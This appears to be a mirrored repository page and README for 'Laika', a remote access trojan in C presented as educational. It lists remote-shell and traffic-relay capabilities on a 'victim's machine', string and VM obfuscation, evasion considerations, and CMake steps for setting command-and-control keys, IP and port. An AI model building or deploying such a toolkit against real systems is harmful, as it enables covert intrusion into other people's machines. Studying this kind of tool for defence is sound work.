1
0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-21 20:40:05 +00:00
Cross-platform RAT, written in Modern C
Go to file
2022-04-06 00:27:28 -05:00
.github/workflows Removed MacOS target 2022-03-15 12:57:58 -05:00
.vscode Added Tunnel & Tunnel Connection boilerplate to lib 2022-03-28 15:49:50 -05:00
bot Added config inis, key refactoring 2022-04-05 23:57:37 -05:00
cmake-modules Minor cmake refactoring 2022-03-14 00:51:11 -05:00
cnc Added config inis, key refactoring 2022-04-05 23:57:37 -05:00
img made with <3 2022-03-24 19:45:07 -05:00
lib Clean up 2022-04-06 00:27:28 -05:00
shell Added config inis, key refactoring 2022-04-05 23:57:37 -05:00
tools Deprecated panel, added shell, lrsa.h -> lsodium.h 2022-02-24 22:13:05 -06:00
.gitignore Added config inis, key refactoring 2022-04-05 23:57:37 -05:00
.gitmodules Minor cmake refactoring 2022-03-14 00:51:11 -05:00
CMakeLists.txt moved windows binaries to 'winbin' 2022-04-04 15:54:41 -05:00
LICENSE.md added software license (finally) 2022-03-07 10:58:20 -06:00
README.md Updated README 2022-03-28 16:28:44 -05:00
server.ini Added config inis, key refactoring 2022-04-05 23:57:37 -05:00
shell.ini Added config inis, key refactoring 2022-04-05 23:57:37 -05:00

Laika

Workflow License

Laika is a simple Remote Access Toolkit stack for educational purposes. It allows authenticated communication across a custom protocol with generated key pairs which are embedded into the executable (only the public key is embedded in the bot client ofc). The bot client supports both Windows & Linux environments, while the shell & CNC server specifically target Linux environments.

DEMO

Some notable features thus far:

  • Lightweight, the bot alone is 270kb (22kb if not statically linked with LibSodium) and uses very little resources minimizing Laika's footprint.
  • Authentication & packet encryption using LibSodium and a predetermined public CNC key.
  • Ability to open shells remotely on the victim's machine.
  • Ability to relay socket connections to/from the victim's machine.
  • Uses obfuscation techniques also seen in the wild (string obfuscation, tiny VMs executing sensitive operations, etc.)
  • Simple configuration using CMake
    • Setting keypairs (-DLAIKA_PUBKEY=? -DLAIKA_PRIVKEY=?, etc.)
    • Obfuscation modes

Would this work in real world scenarios?

My hope is that this becomes complete enough to be accurate to real RAT sources seen in the wild. However since Laika uses a binary protocol, the traffic the bot/CNC create would look very suspect and scream to sysadmins. This is why most RATs/botnets nowadays use an HTTP-based protocol, not only to 'blend in' with traffic, but it also scales well with large networks of bots where the CNC can be deployed across multiple servers and have a generic HTTP load balancer.

I could add some padding to each packet to make it look pseudo-HTTP-like, however I haven't given much thought to this.

Directories explained

  • /cmake-modules holds helper functions for CMake.
  • /lib is a shared static library between the bot, shell & CNC. LibSodium is also vendor'd here.
  • /cnc is the Command aNd Control server. (Currently only targets Linux)
  • /bot is the bot client to be ran on the target machine. (Targets both Linux and Windows)
  • /shell is the main shell to connect to the CNC server with to issue commands. (Currently only targets Linux)
  • /tools holds tools for generating keypairs, etc.

CMake Definitions

Definition Description Example
LAIKA_PUBKEY Sets CNC's public key -DLAIKA_PUBKEY=997d026d1c65deb6c30468525132be4ea44116d6f194c142347b67ee73d18814
LAIKA_PRIVKEY Sets CNC's private key -DLAIKA_PRIVKEY=1dbd33962f1e170d1e745c6d3e19175049b5616822fac2fa3535d7477957a841
LAIKA_CNC_IP Sets CNC's public ip -DLAIKA_CNC_IP=127.0.0.1
LAIKA_CNC_PORT Sets CNC's bind()'d port -DLAIKA_CNC_PORT=13337

examples are passed to cmake -B <dir>

Configuration and compilation

Make sure you have the following libraries and tools installed:

  • CMake (>=3.10)
  • Compiler with C11 support (GCC >= 4.7, Clang >= 3.1, etc.)

The only dependency (LibSodium) is vender'd and statically compiled against the /lib. This should be kept up-to-date against stable and security related updates to LibSodium.

First, compile the target normally

$ cmake -B build && cmake --build build

Now, generate your custom key pair using genKey

$ ./bin/genKey

Next, rerun cmake, but passing your public and private keypairs

$ rm -rf build &&\
    cmake -B build -DLAIKA_PUBKEY=997d026d1c65deb6c30468525132be4ea44116d6f194c142347b67ee73d18814 -DLAIKA_PRIVKEY=1dbd33962f1e170d1e745c6d3e19175049b5616822fac2fa3535d7477957a841 -DCMAKE_BUILD_TYPE=MinSizeRel &&\
    cmake --build build

Output binaries are put in the ./bin folder